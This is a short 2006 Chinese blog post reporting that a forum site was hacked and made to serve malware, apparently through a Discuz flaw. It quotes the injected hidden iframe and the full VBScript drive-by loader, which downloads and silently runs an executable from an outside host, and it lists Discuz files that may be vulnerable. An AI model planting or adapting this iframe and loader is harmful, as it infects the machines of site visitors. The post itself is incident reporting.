落伍被挂马了

2006/09/03 12:09 | 鬼仔 | 乱七八糟 | 占个座先

ps:在neeao和CN.Tink那里都看到了这个消息,我综合一下。估计是因为前两天DZ出的新洞被拿的,是一个叫freediscuz的论坛公布的漏洞,不过没有公布详细信息,只给了补丁。

看了下首页,有这么句,

<iframe src=http://www.lynndent.com/cf/style.htm width=0 height=0></iframe>

然后打开了这个地址..

代码包含

<script language="VBScript">
on error resume next
my = "http://www.lynndent.com/cf/kkk.exe"
Set CAOc = document.createElement("object")
CAOc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

CAOi="Microsoft.XMLHTTP"
Set CAOd = CAOc.CreateObject(CAOi,"")
sf="Adodb."
sg=""
sh="S"
si="tream"
nihao= "lalalalala8888888"
chuanshuozhongdejingling= "哈哈"
haha="nihao"
CAOf=sf&sg&sh&si
CAOg=CAOf
set CAOa = CAOc.createobject(CAOg,"")
CAOa.type = 1
CAOh="GET"
CAOd.Open CAOh, my, False
CAOd.Send
CAO9="internat.exe"
set CAOb = CAOc.createobject("Scripting.FileSystemObject","")
set CAOe = CAOb.GetSpecialFolder(2)
CAOa.open
CAO9= CAOb.BuildPath(CAOe,CAO9)
CAOa.write CAOd.responseBody
CAOa.savetofile CAO9,2
CAOa.close
set CAOe = CAOc.createobject("Shell.Application","")
CAOe.ShellExecute CAO9,BBS,BBS,"open",0
</script>[/quote]

漏洞可能所在文件:
\upload\include\chinese.class.php
\upload\include\common.inc.php
\upload\include\db_mysql.class.php
\upload\include\db_mysql_error.inc.php
\upload\include\global.func.php
\upload\include\newreply.inc.php
\upload\include\post.func.php
\upload\search.php
\seccode.php
\viewthread.php
\discuz_version.php

Tags: ,

相关日志

发表评论